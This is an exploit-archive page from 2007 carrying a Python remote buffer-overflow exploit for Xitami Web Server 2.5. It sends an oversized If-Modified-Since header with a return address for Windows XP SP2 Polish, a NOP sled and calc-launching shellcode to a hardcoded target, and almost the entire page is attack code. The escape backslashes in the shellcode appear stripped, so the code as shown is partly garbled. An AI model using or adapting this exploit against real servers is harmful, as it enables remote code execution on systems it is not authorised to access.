Home / exploitsPDF  

xitami-overflow.txt

Posted on 25 September 2007

#!/usr/bin/python # Xitami Web Server 2.5 (If-Modified-Since) 0day Remote Buffer Overflow Exploit # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> # Tested on: Xitami 2.5c2 / XP SP2 Polish # Shellcode: Windows Execute Command (calc) <metasploit.com> # Details:.. # # [Module xigui32.exe] # If-Modified-Since: Evil, ["A" * 76] # EIP 41414141 # # [Module xitami.exe] # If-Modified-Since: Evil, ["A" * 104] # EIP 41414141 # # Product Homepage: http://www.xitami.com/ # Just for fun ;) ## from struct import pack from time import sleep from socket import * host = "192.168.0.1" port = 80 shellcode = ( "x6ax22x59xd9xeexd9x74x24xf4x5bx81x73x13x8dx6cxf6" "xb2x83xebxfcxe2xf4x71x84xb2xb2x8dx6cx7dxf7xb1xe7" "x8axb7xf5x6dx19x39xc2x74x7dxedxadx6dx1dxfbx06x58" "x7dxb3x63x5dx36x2bx21xe8x36xc6x8axadx3cxbfx8cxae" "x1dx46xb6x38xd2xb6xf8x89x7dxedxa9x6dx1dxd4x06x60" "xbdx39xd2x70xf7x59x06x70x7dxb3x66xe5xaax96x89xaf" "xc7x72xe9xe7xb6x82x08xacx8exbex06x2cxfax39xfdx70" "x5bx39xe5x64x1dxbbx06xecx46xb2x8dx6cx7dxdaxb1x33" "xc7x44xedx3ax7fx4ax0exacx8dxe2xe5x9cx7cxb6xd2x04" "x6ex4cx07x62xa1x4dx6ax0fx97xdexeex6cxf6xb2") opcode = pack("<L", 0x7CA76981) # jmp esp (shell32.dll / XP SP2 Polish) jmpcode = "xebx22" # jmp short +0x22 buf = "A" * 72 # (76 - 4) xigui32.exe buf += opcode buf += jmpcode buf += "x90" * 128 buf += shellcode header = ( 'GET / HTTP/1.1 ' 'Host: %s ' 'If-Modified-Since: Evil, %s ' ' ') % (host, buf) s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send(header) sleep(1) s.close() print "DONE" # EoF

 

TOP